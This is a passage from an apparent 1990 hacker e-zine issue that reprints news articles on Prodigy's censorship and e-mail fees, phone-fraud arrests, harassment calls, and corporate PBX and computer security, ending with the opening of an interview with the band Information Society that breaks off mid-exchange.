-- the ones advertisers would want to see on-line because they are the most
|
|
active ones on the system and so more likely to see their ads.
|
|
|
|
The group is also upset with the way the company screens messages meant for
|
|
public conferences. Other services allow users to see "postings"
|
|
immediately.
|
|
|
|
"They are infamous for this unpredicible and unfathomable censorship," Hay
|
|
said.
|
|
|
|
"We feel what we are doing is not censoring because what we are essentially
|
|
doing is electronic publishing," Ek said, comparing the public messages to
|
|
letters to the editor of a family newspaper.
|
|
|
|
Neil Harris, marketing director at the competing GEnie service, said many
|
|
people would feel intimidated knowing that what they write is being screened.
|
|
He said GEnie only rarely has to deleted messages. And he said GEnie has
|
|
picked up several thousand new customers from among disgruntled Prodigy users.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
"Conversations with Fred," {Middlesex News}, Framingham, 11/6/90.
|
|
|
|
The story is bizarre but true, swears Herb Rothman. Seems Prodigy, the network
|
|
run as a joint venture by Sears and IBM, wouldn't let somebody post a message
|
|
in a coin-collecting forum that he was looking for a particular Roosevelt dime
|
|
for his collection. Upset, the man called "member services." The
|
|
representative told him the message violated a Prodigy rule against mentioning
|
|
another user in a public message. "What user?" the man asked. "Roosevelt
|
|
Dime," the rep replied. "That's not a person!" the man said. "Yes he is,
|
|
he's a halfback for the Chicago Bears," the rep shot back.
|
|
|
|
Rothman is one of those alleged compu-terrorists Prodigy claims is harassing
|
|
other users and companies that advertise on the service by sending out
|
|
thousands upon thousands of increasingly hostile messages in protest of a
|
|
Prodigy plan to begin charging users who send more than 30 e-mail messages a
|
|
month. Rothman and the others say they sent very polite messages to people
|
|
(Penny Hay of Los Angeles says her messages were even approved by the Prodigy
|
|
legal department) telling them about the new fees and urging them to protest.
|
|
|
|
What's really happening is that Prodigy is proving its complete arrogance and
|
|
total lack of understanding of the dynamics of on-line communication. They
|
|
just don't get it. People are NOT going to spend nearly $130 a year just to
|
|
see the weather in Oregon or order trips to Hawaii.
|
|
|
|
Even the computerphobes Prodigy wants to attract quickly learn the real value
|
|
of the service is in finding new friends and holding intelligent "discussions"
|
|
with others across the country.
|
|
|
|
But Prodigy blithely goes on censoring everything meant for public consumption,
|
|
unlike other nationwide services (or even bulletin-board systems run out of
|
|
some teenager's bedroom). Rothman's story is not the only one about capricious
|
|
or just plain stupid censoring. Dog fanciers can't use the word ``bitch'' when
|
|
talking about their pets, yet the service recently ran an advice column all
|
|
about oral sex. One user who complained when a message commenting on the use
|
|
of the term "queen bitch" on "L.A. Law" was not allowed on was told that
|
|
"queen b***h" would be acceptable, because adults would know what it meant
|
|
but the kiddies would be saved.
|
|
|
|
So when the supposed technology illiterates Prodigy thinks make up its user
|
|
base managed to get around this through the creation of private mail "lists"
|
|
(and, in fact, many did so at the urging of Prodigy itself!), Prodigy started
|
|
complaining of "e-mail hogs," quietly announced plans to levy charges for more
|
|
than a minute number of e-mail messages each month and finally, simply canceled
|
|
the accounts of those who protested the loudest!
|
|
|
|
And now we are watching history in the making, with the nation's first
|
|
nationwide protest movement organized almost entirely by electronic mail (now
|
|
don't tell Prodigy this, but all those people they kicked off quickly got back
|
|
onto the system -- Prodogy allows up to six users per household account, and
|
|
friends simply loaned their empty slots to the protest leaders).
|
|
|
|
It's truly amazing how little faith Prodigy has in the ability of users to
|
|
behave themselves. Other systems have "sysops" to keep things in line, but
|
|
rarely do they have to pull messages. Plus, Prodigy is just being plain dumb.
|
|
Rothman now has a mailing list of about 1,500. That means every time he sends
|
|
out one of his newsletters on collectibles, he sends 1,500 e-mail messages,
|
|
which, yes, costs more for Prodigy to send over long-distance lines and store
|
|
in its central computers. But if they realized their users are generally
|
|
mature, rather than treating them as 4-year-olds, Rothman could post just one
|
|
message in a public area, that everybody could see.
|
|
|
|
Is this any way to run an on-line system? Does Prodigy really want to drive
|
|
away the people most inclined to use the service -- and see all those ads that
|
|
pop up at the bottom of the screen? Prodigy may soon have to do some
|
|
accounting to the folks at IBM and Sears, who by most accounts have already
|
|
poured at least $750 million into "this thing."
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - -
|
|
With your computer and modem, you can reach Fred the Middlesex News
|
|
Computer anytime, day or night, at (508) 872-8461. Set your parameters
|
|
to 8-1-N and up to 2400 baud.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE Cops Say Hacker, 17, `Stole' Phone Service
|
|
Byline: By Joshua Quittner
|
|
DATE 10/31/90
|
|
SOURCE Newsday (NDAY)
|
|
Edition: NASSAU AND SUFFOLK
|
|
Section: NEWS
|
|
Page: 02
|
|
(Copyright Newsday Inc., 1990)
|
|
|
|
State Police arrested a 17-year-old computer hacker at his terminal yesterday
|
|
afternoon, and charged the Bethpage High School student with using his computer
|
|
to run up more than $1 million worth of long-distance telephone calls on credit
|
|
card numbers he deciphered.
|
|
|
|
State Police Senior Investigator Donald Delaney, who supervised the
|
|
investigation and arrest of John Farrell, of 83 S. Third St., said that the
|
|
case was among the first to rely on new technology developed by
|
|
telecommunications engineers to track long-distance telephone-service abusers.
|
|
|
|
Investigators believe that as early as December, 1989, Farrell was using his
|
|
computer and a homemade electronic device, known as a black box, to
|
|
sequentially dial telephone numbers, which double as credit card numbers. By
|
|
automatically calling the numbers in sequence, Farrell hoped to trigger a
|
|
signal indicating a valid credit card number.
|
|
|
|
However, AT&T, which recently developed software to detect such sequential
|
|
dialing, alerted Delaney's office in September of Farrell's alleged attempts.
|
|
In July, investigators surreptitiously placed a "pen register" - a device that
|
|
records all numbers dialed from a particular phone line - on Farrell's
|
|
telephone, Delaney said.
|
|
|
|
State Police and U.S. Secret Service agents - the federal agency has been
|
|
taking an active part in computer crimes and investigates credit card fraud -
|
|
staked out Farrell's house yesterday afternoon. Shortly after 3 p.m., when the
|
|
youth arrived home from school, technicians monitoring his telephone line
|
|
signaled the police that he had already turned on his computer and was using an
|
|
illegal credit card number to access an electronic bulletin board in Illinois,
|
|
police said. Officers, armed with a search warrant, then entered the house and
|
|
arrested Farrell.
|
|
|
|
Delaney said Farrell found over 100 long-distance credit card numbers, from
|
|
four long-distance carriers, and posted them on rogue electronic bulletins
|
|
boards in Virginia, Chicago, Denmark and France. Although he allegedly made
|
|
most of the illegal calls, other hackers also used the numbers. The majority
|
|
of the calls - more than $600,000 worth - were billed to four corporate card
|
|
numbers, said Delaney, who added that the phone company is responsible for such
|
|
losses. Farrell was arrested and charged with six felonies, including grand
|
|
larceny, computer trespass and criminal possession of stolen property. The
|
|
charges carry a maximum penalty of four years in prison. He was released into
|
|
the custody of his parents last night. Neither Farrell nor his parents could
|
|
be reached for comment yesterday. Farrell was associated with a group of
|
|
hackers who called themselves Paradox, Delaney said.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE Menacing calls started out as prank, says participant
|
|
Byline: Katharine Webster and Graciella Sevilla
|
|
Credit: Staff Writer
|
|
Notes: Editions vary : Head varies
|
|
DATE 10/28/90
|
|
SOURCE The San Diego Union and Tribune (SDU)
|
|
Pub: UNION
|
|
Edition: 1,2,3,4,5,6
|
|
Section: LOCAL
|
|
Page: B-1
|
|
(Copyright 1990)
|
|
|
|
A three-year campaign of telephoned threats and ethnic slurs directed against
|
|
the Jewish owner of a National City pawn shop started out as a "stupid prank"
|
|
that grew to include more than 100 people, according to one of the young men
|
|
who participated in the harassment. "Little did I know when I started this
|
|
three years ago, that it would escalate into my brother calling (David Vogel)
|
|
10 times a day," said Gary Richard Danko, 21, of Chula Vista, who cooperated
|
|
with the FBI investigation that resulted in the indictment Wednesday of his
|
|
older brother and two other men on civil rights charges.
|
|
|
|
Michael Dennis Danko, 23, and Brett Alan Pankauski, 22, both of Chula Vista,
|
|
and Jeffrey Alan Myrick, 21, of Paradise Hills in San Diego, pleaded not guilty
|
|
in U.S. District Court yesterday to a six-count indictment charging them with
|
|
wire fraud and felony conspiracy to violate the civil rights of David Vogel, a
|
|
66-year-old Jewish immigrant who escaped the Holocaust.
|
|
|
|
Pankauski was released on $10,000 bail and admonished to avoid all contact with
|
|
Vogel. But Danko and Myrick were held without bail pending an Oct. 4
|
|
detention hearing after federal prosecutor Michael McAuliffe convinced
|
|
Magistrate Irma Gonzalez that they posed substantial flight risks.
|
|
|
|
On Wednesday, Gary Danko and a friend, Robert John Byrd, 21, also of Chula
|
|
Vista, pleaded guilty to one misdemeanor count of conspiring to violate Vogel's
|
|
civil rights, according to a spokesman for the U.S. attorney's office. The
|
|
two friends, who met while working at a 7-Eleven, were released and agreed to
|
|
testify at the trial of the remaining three defendants.
|
|
|
|
Though the arrests climaxed a five-month investigation involving the FBI, U.S.
|
|
attorney's office and the Department of Justice, Gary Danko said yesterday that
|
|
the menacing phone calls to numbers picked "at random" from the telephone book
|
|
began years ago.
|
|
|
|
The group of friends, most of whom have known each other since elementary
|
|
school, all used to make crank phone calls, Danko said, even to each other.
|
|
They also experimented with breaking codes for answering machines and changing
|
|
the outgoing message to something profane.
|
|
|
|
While he said he stopped making the calls to Vogel a couple of years ago, his
|
|
brother and others "took it out to a degree to torment the guy."
|
|
|
|
"I feel bad that it turned out this way," Danko said. "I wish there was some
|
|
way I could make it up to David (Vogel)."
|
|
|
|
"I know how he feels," Danko added. "Ever since I've had my own phone line
|
|
I've had harassing phone calls between 2 and 6 in the morning to the point
|
|
where I've changed my phone number three times." Danko denied that he, his
|
|
brother, or any of the other defendants in the case were racists or that they
|
|
had targeted Vogel for any particular reason. He said that the defendants made
|
|
crank calls to many people, and that the anti-Jewish nature of the calls to
|
|
Vogel was probably based on a "lucky guess" that he was Jewish.
|
|
|
|
According to the indictment, Michael Danko, Myrick, and Pankauski made phone
|
|
calls in which they referred to Nazi concentration camps and Hitler, while
|
|
threatening to harm Vogel and his pawn-shop business.
|
|
|
|
Vogel said he began receiving the phone calls -- which included racial slurs
|
|
and taunts about his wife -- in 1987. Sometimes he received up to 12 calls a
|
|
day, creating a "personal hell." Earlier this year, he finally hired a private
|
|
investigator, who then turned the case over to the FBI.
|
|
|
|
"It caused suffering for us like the concentration camps did for my family,"
|
|
Vogel said. "It was horrible."
|
|
|
|
Another relative of Gary and Michael Danko, who asked not to be identified,
|
|
said he thought the calls to Vogel continued only "because they got a reaction
|
|
out of him -- he screamed and yelled at them." But he said Vogel was probably
|
|
not the only Jew targeted in the phone calls.
|
|
|
|
The relative agreed with FBI agents, who described these incidents as isolated
|
|
and not connected with organized racist groups such as the Skinheads.
|
|
|
|
Instead, he said, the brothers thought they were doing "something funny." He
|
|
said he thought they still didn't realize they were doing something wrong, even
|
|
though he had "yelled and screamed at them" to stop.
|
|
|
|
Gary Danko is a computer "hacker" who works at a computer store, he said.
|
|
Michael Danko was unemployed.
|
|
|
|
FBI agents began investigating the calls in May, when they placed a tape
|
|
recorder on Vogel's phone. It only took a few moments before the first hate
|
|
call came in.
|
|
|
|
Agents traced the calls to a number of phone booths and then began putting
|
|
together the wire-fraud case.
|
|
|
|
In addition to the civil rights violations, the indictment alleges that the
|
|
three defendants conspired to obtain unauthorized AT&T long-distance access
|
|
codes to make long-distance phone calls without paying for them.
|
|
|
|
If convicted of the civil rights and wire-fraud charges, the defendants could
|
|
face up to 15 years in prison and $500,000 in fines. In addition, they face
|
|
various additional charges of illegally obtaining and using the restricted
|
|
long-distance access codes.
|
|
|
|
Yesterday, Vogel angrily rejected the notion that these callers were less than
|
|
serious in their intentions.
|
|
|
|
"They're full of baloney. They don't know what they are talking about," he
|
|
said.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
HEADLINE SHORT-CIRCUITING DATA CRIMINALS
|
|
STEPS CAN BE TAKEN TO DETECT AND PREVENT COMPUTER SECURITY BREACHES,
|
|
BUT BUSINESSES HESITATE TO PROSECUTE
|
|
Byline: Mary J. Pitzer Daily News Staff Writer
|
|
Notes: MONDAY BUSINESS: COVER STORY THE PRICE OF COMPUTER
|
|
CRIME. Second of two parts
|
|
DATE 10/22/90
|
|
SOURCE LOS ANGELES DAILY NEWS (LAD)
|
|
Edition: Valley
|
|
Section: BUSINESS
|
|
Page: B1
|
|
(Copyright 1990)
|
|
|
|
Along with other telecommunications companies, Pacific Bell is a favorite
|
|
target for computer crime.
|
|
|
|
"We're a victim," said Darrell Santos, senior investigator at Pacific Bell.
|
|
"We have people hacking us and trying to get into our billables. It seems like
|
|
a whole lot of people are trying to get into the telecommunications network."
|
|
|
|
But the company is fighting back. About seven employees in its investigative
|
|
unit work with different law enforcement agencies to track down criminals, many
|
|
of whom use the phone lines to commit computer crimes.
|
|
|
|
In cooperation with authorities Pacific Bell investigators collect evidence,
|
|
trace calls, interview suspects and testify in court. They even do their own
|
|
hacking to figure out what some of their chief adversaries are up to.
|
|
|
|
"We take a (telephone) prefix and hack the daylights out of it. We hack our
|
|
own numbers," Santos said. "Hey, if we can do it, think of what those brain
|
|
childs are doing."
|
|
|
|
Few companies are nearly so aggressive. For the most part computer crime is a
|
|
growing business that remains relatively unchecked. State and federal laws
|
|
against computer crime are in place, but few cases are prosecuted. Most
|
|
incidents go unreported, consultants say.
|
|
|
|
"We advise our clients not to talk about losses and security because just
|
|
talking about them in public is a breach," said Donn Parker, a senior managment
|
|
consultant at SRI International in Palo Alto. "Mostly companies handle
|
|
incidents privately or swallow the loss."
|
|
|
|
Most problematic is that few companies have tight enough security to protect
|
|
themselves.
|
|
|
|
"On a scale of one to 10, the majority of companies are at about a two," said
|
|
Jim Harrigan, senior security consultant at LeeMah Datacom Security Corp.,
|
|
which sells computer security products.
|
|
|
|
Current laws are strong enough to convict computer criminals, security experts
|
|
say. But they have been little used and sentences are rarely stiff, especially
|
|
because so many violators are juveniles.
|
|
|
|
Fewer than 250 computer crime cases have been prosecuted nationally, according
|
|
to Kenneth Rosenblatt, head of the Santa Clara County district attorney's high
|
|
technology unit. Rosenblatt co-authored California's recent computer crime
|
|
law, which creates new penalties such as confiscation of computer equipment.
|
|
|
|
Under a strengthened federal Computer Fraud and Abuse Act, Cornell University
|
|
graduate student Robert T. Morris Jr. was convicted of unleashing a computer
|
|
virus in Internet, a large computer network tying universities and government
|
|
facilities. Though the virus was not intended to destroy programs, it infected
|
|
thousands of computers and cost between $100,000 and $10 million to combat,
|
|
according to author and hacking expert Cliff Stoll.
|
|
|
|
Morris was sentenced to three years probation and a $10,000 fine.
|
|
|
|
A major problem in policing computer crime is that investigators are
|
|
understaffed and undertrained, Rosenblatt said. While Los Angeles and other
|
|
police departments have computer crime units, most are not geared for it, he
|
|
said. And violent crimes take precedence.
|
|
|
|
Rosenblatt would like to see greater regional cooperation and coordination
|
|
among local law enforcement agencies.
|
|
|
|
Because investigators are understaffed, they must depend on their victims to
|
|
gather enough evidence to convict the culprits. And that can be fraught with
|
|
difficulties, Kenneth Weaver, criminal investigator in the San Diego district
|
|
attorney's office, said at a recent security conference in Newport Beach.
|
|
|
|
In one case a company's computer system crashed and its programs were erased 30
|
|
days after an employee left the firm. With six months of backup tapes, the
|
|
company was able to document what had happened. The District Attorney's office
|
|
asked to estimate how much money had been lost.
|
|
|
|
The total came to $3,850, well below the $5,000 in damages needed for a felony
|
|
case, Weaver said. And then the information was delayed 14 months. It needed
|
|
to be reported in 12 months for the D.A. to go forward with the case.
|
|
|
|
"We were prevented from prosecuting," Weaver said. In California, 71 percent
|
|
of the cases result in convictions once arrests are made, according to the
|
|
National Center for Computer Crime Data.
|
|
|
|
But when prosecutors do make a case, there can be more trouble. Some prominent
|
|
people in the computer industry have complained that a 2-year investigation by
|
|
the U.S. Secret Service infringed on civil rights.
|
|
|
|
The investigation, code-named Operation Sun Devil, was started to snare members
|
|
of the Legion of Doom, an elite hacker group. The Secret Service suspected
|
|
that they had broken into BellSouth Corp.'s telephone network and planted
|
|
destructive programs that could have knocked out emergency and customer phone
|
|
service across several states. Last spring, hacker dens in 13 cities were
|
|
raided. Two suspects have been charged with computer crimes, and more arrests
|
|
are expected.
|
|
|
|
But a group called EFF, formed in July by Lotus Development Corp. founder
|
|
Mitchell D. Kapor and Apple Computer Inc. co-founder Stephen Wozniak, has
|
|
objected to the crackdown as overzealous.
|
|
|
|
"The excesses of Operation Sun Devil are only the beginning of what threatens
|
|
to become a long, difficult, and philosophically obscure struggle between
|
|
institutional control and individual liberty," Kapor wrote in a paper with
|
|
computer expert and Grateful Dead lyricist John Perry Barlow.
|
|
|
|
So far, the foundation has granted $275,000 to Computer Professionals for
|
|
Social Responsibility to expand its ongoing work on civil liberties protections
|
|
for computer users.
|
|
|
|
The foundation also is offering legal assistance to computer users who may have
|
|
had their rights infringed. For example, it provided legal support to Craig
|
|
Neidorf, publisher of an online hacking "magazine." Neidorf had been charged
|
|
with felony wire fraud and interstate transportation of stolen property for
|
|
publishing BellSouth network information.
|
|
|
|
Neidorf said he was not aware the information was stolen. EFF claimed that
|
|
Neidorf's right to free speech had been violated. The government dropped its
|
|
case after EFF representatives found that the apparently stolen information was
|
|
publicly available.
|
|
|
|
Companies that want to prosecute computer crime face other dilemmas.
|
|
|
|
"The decision to bring in public authorities is not always the best," said
|
|
Susan Nycum, an attorney at Baker & McKenzie in Palo Alto.
|
|
|
|
In a criminal case, the company loses control over what information is made
|
|
public in the trial. But companies can pursue civil remedies that enable them
|
|
to keep a lower profile. Suing for theft of trade secret, for example, would
|
|
be one avenue, Weaver said.
|
|
|
|
Many companies are reluctant to beef up security even if they know the risks
|
|
from computer crime. First, they worry that making access to computers more
|
|
difficult would lower productivity. There also is concern that their technical
|
|
people, who are in high demand, might leave for other jobs if security becomes
|
|
too cumbersome.
|
|
|
|
Expense is another factor. Serious security measures at a large installation
|
|
can cost an average of $100,000, though a smaller company can be helped for
|
|
about $10,000, said Trevor Gee, partner at consulting company Deloitte and
|
|
Touche.
|
|
|
|
"They hear all the rumors, but unless you illustrate very specific savings,
|
|
they are reluctant," Gee said.
|
|
|
|
Proving cost savings is difficult unless the company already has been hit by
|
|
computer crime. But those victims, some of whom have suffered losses in the
|
|
millions, are usually security experts' best customers, consultants say.
|
|
|
|
Much of the vulnerability to computer crime comes simply from lax security.
|
|
Access is not restricted. Doors are not locked. Passwords are easily guessed,
|
|
seldom changed and shared with several workers. And even these basic security
|
|
measures are easy to put off.
|
|
|
|
"You hear a lot of, `We haven't gotten around to changing the password because.
|
|
. .," Roy Alzua, telecommunications security program manager at Rockwell
|
|
International, told the security conference.
|
|
|
|
So what should companies do to plug the gaping security holes in their
|
|
organizations?
|
|
|
|
Consultants say that top management first has to make a commitment that
|
|
everyone in the operation takes seriously.
|
|
|
|
"I've seen companies waste several hundreds, if not thousands, of dollars
|
|
because management was not behind the program," Deloitte & Touche's Gee said.
|
|
"As a result, MIS (management information systems) professionals have a tough
|
|
time" pressing for more security.
|
|
|
|
Once top executives are convinced that there is a need for tighter security,
|
|
they must establish policies and procedures, consultants say. Gee suggests
|
|
that in addition to training programs, reminders should be posted. Such issues
|
|
as whether employees are allowed to use computers for personal projects should
|
|
be tackled.
|
|
|
|
Management also should decide what systems and information need to be secured.
|
|
|
|
"They need to zero in on the information they are really concerned about," said
|
|
Gregory Therkalsen, national director of information security services for
|
|
consultants Ernst & Young. "About 95 percent of the information in the average
|
|
company nobody cares about."
|
|
|
|
Before tackling complicated security systems, companies should pay attention to
|
|
the basics.
|
|
|
|
"Lock a door. It's as easy as that," Alzua said.
|
|
|
|
Companies should make sure that the passwords that come with their computers
|
|
are changed. And then employees should not use common words or names that are
|
|
easy to guess. Using a combination of numbers and letters, although difficult
|
|
to remember, is more secure.
|
|
|
|
Another basic measure is to have a system that automatically checks the
|
|
authorization of someone who dials into the company's computers from the
|
|
outside.
|
|
|
|
Then, companies should develop an electronic audit trail so that they know who
|
|
is using the system and when. And companies should always take the time to
|
|
make backups of their computer files and store them in a place safe from fire
|
|
and flood.
|
|
|
|
A wide variety of software is available to help companies protect themselves.
|
|
Some automatically encode information entered into the system. Others detect
|
|
viruses.
|
|
|
|
For a more sophisticated approach, LeeMah Datacom has a system that blocks a
|
|
computer tone from the telephone line until the correct access code is entered.
|
|
The company has held contests challenging hackers to break into its system. No
|
|
one has, the company said.
|
|
|
|
SRI is developing a system that would monitor computer activity around the
|
|
clock with the supervision of a security guard. SRI is implementing the system
|
|
for the FBI and plans to make it a commercial product.
|
|
|
|
No company would want to have a perfectly secure system, consultants say. That
|
|
would mean shutting out most employees and staying off networks that can make
|
|
operations more efficient.
|
|
|
|
While still balancing the need for openess, however, there is much that can be
|
|
done to prevent computer crime. And although there is no perfect solution,
|
|
companies don't need to stand by waiting to become the next victim.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME CUSTOMERS
|
|
DATE 09/26/90
|
|
SOURCE CANADA NEWS-WIRE (CNW)
|
|
Contact: For further information, contact: Irene Colella (416)
|
|
581-4266; Geoff Matthews, Bell Canada (416) 581-4205. CO: Bell Canada
|
|
SS: IN: TLS
|
|
Origin: TORONTO
|
|
Language: ENGLISH; E
|
|
Day of Week: Wed
|
|
Time: 09:56 (Eastern Time)
|
|
(Copyright Canada News-Wire)
|
|
RE CN
|
|
--- BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME
|
|
CUSTOMERS ---
|
|
|
|
TORONTO - Bell Canada's new look telephone numbers in Southern Ontario are
|
|
causing puzzlement among some customers in the 416 area code.
|
|
|
|
In late 1988 Bell found itself running short of telephone numbers in the Golden
|
|
Horseshoe because of rapid business and residential growth as well as the
|
|
increasing popularity of cellular telephones, fax machines and new services
|
|
like Ident-A-Call.
|
|
|
|
To accommodate continuing growth, the company had to come up with a means of
|
|
creating new number combinations. The solution was found by assigning local
|
|
exchanges made up of combinations which had previously been reserved as area
|
|
codes elsewhere in North America.
|
|
|
|
Until March of this year the three numbers (known as a central office code)
|
|
which begin a telephone number never had a zero or a one as the second digit.
|
|
Anything from two through nine could appear in that position, but combinations
|
|
with zero or one were used only as area codes. But with more than four million
|
|
telephone numbers in use throughout the Golden Horseshoe Bell was simply
|
|
running out of the traditional central office code combinations. By creating
|
|
new central office codes such as 502, 513, 602 and 612, the company has access
|
|
to up to one million new telephone numbers.
|
|
|
|
Some customers, however, have found the new numbers a little confusing. When
|
|
the new numbers were introduced last March, Bell mounted an extensive
|
|
advertising campaign telling customers throughout the 416 area code to dial 1
|
|
plus 416 or 0 plus 416 for all long distance calls within the area code in
|
|
order to ensure calls to these numbers could be completed.
|
|
|
|
Bell spokesman Geoff Matthews says that while the ad campaign was extremely
|
|
effective in changing dialing habits, a number of customers are scratching
|
|
their heads when they first see the new telephone numbers.
|
|
|
|
``In some cases we are finding that business customers have not programmed
|
|
their telephone equipment to permit dialing the new numbers,'' Matthews said,
|
|
``but some people think it is simply a mistake when they see a telephone number
|
|
beginning with 612 for example. Most are satisfied once they have received an
|
|
explanation.''
|
|
|
|
Creating the million new telephone numbers should see Bell Canada through
|
|
several years, Matthews said, after which a new area code will be introduced.
|
|
|
|
The 416 area code is the first in Canada to reach capacity. A number of U.S.
|
|
cities have faced a similar situation, Matthews said, and have introduced
|
|
similar number plans.
|
|
|
|
Bell Canada, the largest Canadian telecommunications operating company, markets
|
|
a full range of state-of-the-art products and services more than seven million
|
|
business and residence customers in Ontario, Quebec and part of the Northwest
|
|
Territories.
|
|
|
|
Bell Canada is a member of Telecom Canada -- an association of Canada's major
|
|
telecommunications companies.
|
|
|
|
|
|
For further information, contact: Irene Colella (416) 581-4266; Geoff
|
|
Matthews, Bell Canada (416) 581-4205.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE Keeping The PBX Secure
|
|
Byline: Bruce Caldwell
|
|
DATE 10/15/90
|
|
Issue: 291
|
|
Section: TRENDS
|
|
Page: 25
|
|
(Copyright 1990 CMP Publications, Inc. All rights reserved.)
|
|
|
|
Preventing toll fraud through the corporate PBX can be as simple, albeit
|
|
inconvenient, as expanding access codes from four digits to 14. "When we had
|
|
nine-digit codes, we got hurt bad," says Bob Fox of US Sprint Communications
|
|
Co., referring to the phone company's credit card numbers. "But when we moved
|
|
to 14-digit codes and vigorous prosecution, our abuse dropped off the table."
|
|
|
|
At most companies, the authorization code for remote access, used by employees
|
|
to place calls through the corporate PBX while away from the office, is only
|
|
four digits. Many companies are "hung up on the four-digit authorization
|
|
code," says Fox, mainly because it's easier for the executives to remember.
|
|
But all it takes a hacker to crack open a four-digit code is about 20 minutes.
|
|
|
|
To help their customers cope with PBX abuse, MCI Communications Corp. has
|
|
prepared a tip sheet describing preventative measures (see accompanying chart).
|
|
PBX fraud may display itself in a particular pattern: The initial stage will
|
|
show a dramatic increase in 950-outbound and 800-outbound services, which allow
|
|
a surreptitious user to "cover his tracks" by jumping from one carrier to
|
|
another-a technique known as "looping." In time, knowledge of the unsecured
|
|
system may become widespread, resulting in heavy use of services connected with
|
|
normal telecommunications traffic.
|
|
|
|
Customers are advised to audit systems for unusual usage and to change codes on
|
|
a regular basis. Steady tones used as prompts to input access codes should be
|
|
avoided, because that is what hacker-programmed computers look for. Instead,
|
|
MCI advises use of a voice recording or no prompt at all, and recommends
|
|
automatic termination of a call or routing it to a switchboard operator
|
|
whenever an invalid code is entered.
|
|
|
|
An obvious source of help is often overlooked. Explains Jim Snyder, an
|
|
attorney in MCI's office of corporate systems integrity, "The first thing we
|
|
tell customers is to contact their PBX vendor to find out what kind of
|
|
safeguards can be built into the PBX."
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
HEADLINE WATCH YOUR PBX
|
|
Column: Database
|
|
DATE 04/02/90
|
|
SOURCE COMMUNICATIONSWEEK (CWK)
|
|
Issue: 294
|
|
Section: PRN
|
|
Page: 24
|
|
(Copyright 1990 CMP Publications, Inc. All rights reserved.)
|
|
|
|
Many managers of voice systems would be "horrified" if they realized the low
|
|
levels of security found in their PBXs, according to Gail Thackeray, an
|
|
assistant attorney general for the state of Arizona. Thackeray made her
|
|
comments to a group of financial users at a computer virus clinic held by the
|
|
Data Processing Management Association's Financial Industries chapter.
|
|
Thackeray, who investigates computer crimes, said that PBXs often are used by
|
|
network criminals to make free long distance phone calls at the expense of the
|
|
companies that own the PBXs. "PBX owners are often unaware that if $500,000
|
|
worth of fraud comes from your PBX, the local carrier is not going to absorb
|
|
that loss," she said.
|
|
|
|
The PBX also is often the first source of break-in by computer hackers, who use
|
|
the free phone service to get into a user's data system, she said. "PBXs are
|
|
the prime method for international toll fraud and hackers attacking and hiding
|
|
behind your corporate identity," Thackeray said.
|
|
|
|
Richard Lefkon, Citicorp's network planner and president of DPMA's financial
|
|
industries chapter, said users are more likely to take steps toward protecting
|
|
a PBX than a network of microcomputers. "A PBX is expensive, so if you add 15
|
|
to 20 percent to protect it, it's a justifiable expenditure," Lefkon said. "If
|
|
you have a PC which costs a couple of thousand dollars, unless you think you're
|
|
special, you are going to think twice before investing several hundred dollars
|
|
per PC to protect them."
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
K N I G H T L I N E
|
|
|
|
Issue 03/Part III of III
|
|
|
|
17th of November, 1990
|
|
|
|
Written, compiled,
|
|
|
|
and edited by Doc Holiday
|
|
|
|
KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
|
|
|
|
---
|
|
|
|
What is this? Information Society's new album is called "HACK"? Just
|
|
what do these guys know about hacking? How did they come up with the album
|
|
title? Why are they taking such an interest in the Computer Underground?
|
|
|
|
Knightline got the chance to ask Kurt Valaquen of InSoc about the new
|
|
album and his involvement with the CU.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
RINGing New York .. .
|
|
|
|
KV: Hello
|
|
Me: Kurt?
|
|
KV: Yes, Doc ?
|
|
Me: Yea, you ready for the interview?
|
|
KV: Sure, shoot.
|
|
Me: Okay, this is DH with Phrack Classic--
|
|
TC: This is the Conflict
|
|
PH: And this is Pain Hertz
|
|
KV: I uh, hope you ask me what my hacker handle is..
|
|
Me: Ok, what's your handle?
|
|
KV: Because I believe that I have one of the coolest hacker's handles that I've
|
|
ever heard.
|
|
TC: uhh
|
|
Me: What is it?
|
|
KV: TRAPPED VECTOR.
|
|
Me: "Trapped Vector" ?
|
|
KV: yep
|
|
Me: How did you come up with that?
|
|
KV: What? You don't recognize it ?
|
|
Me: haha
|
|
KV: What.. . and you guys call yourselves hackers?
|
|
Me: ah
|
|
KV: My god. . you guys must be so young that you've never had to deal with
|
|
assembly language.
|
|
Me: Who would want to-- It was a sarcastic question..
|
|
Me: Now, Kurt..
|
|
KV: Trapped Vector is a term from deep deep down in the functioning's of a CPU.
|
|
Me: Right.
|
|
Me: Uh, uh What kind of involvement, if any, have you had in the
|
|
telecommunications field?
|
|
KV: In telecommunications what?
|
|
Me: In the telecommunications field.
|
|
KV: Uhh.. I majored in computer science at the University of Minnesota.. . Just
|
|
long enough to get interested and not long enough to get a degree.
|
|
Me: ah. So you didn't graduate?
|
|
KV: No. After my 5th year I finally gave up and went to Vienna.
|
|
Me: Uhh. Let's get into the new album .. uh now, what was the inspiration for
|
|
involving the "hacking" theme in your new album?
|
|
KV: Umm, well, it's not like we were inspired to do it -- and we sat around all
|
|
day and said "Hey, let's like put this hacker's moltese into it." -- it's
|
|
more like we just left all that stuff out on our first album because we
|
|
were trying to .. uh.. to not make any waves, since it was our first album.
|
|
And now were cocky and think we can do whatever we want. So we just did
|
|
whatever we wanted. And whenever we do whatever we want, some of that
|
|
stuff inevitably creeps in because .. were into it.
|
|
Me: uhh.. have you been following all of the recent hacking busts that have
|
|
plagued the country this year .. ?
|
|
KV: Hacking "buzz" that has plaged.. .
|
|
Me: BUSTS.. yea hacking busts..
|
|
